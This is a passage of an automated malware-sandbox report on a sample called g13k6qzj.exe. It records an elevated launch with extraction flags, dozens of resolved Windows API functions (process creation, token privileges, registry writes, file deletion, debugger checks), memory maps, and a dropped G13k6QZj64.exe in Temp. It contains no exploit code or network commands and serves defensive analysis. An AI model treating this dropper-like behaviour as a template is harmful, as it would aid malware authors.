|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:16 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #173: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #173 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:02, Reason: Child Process |
| Unmonitor | End Time: 00:03:10, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd90 |
| Parent PID | 0xac8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
988
0x
2EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00220000 | 0x00249fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x01d5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01e8ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
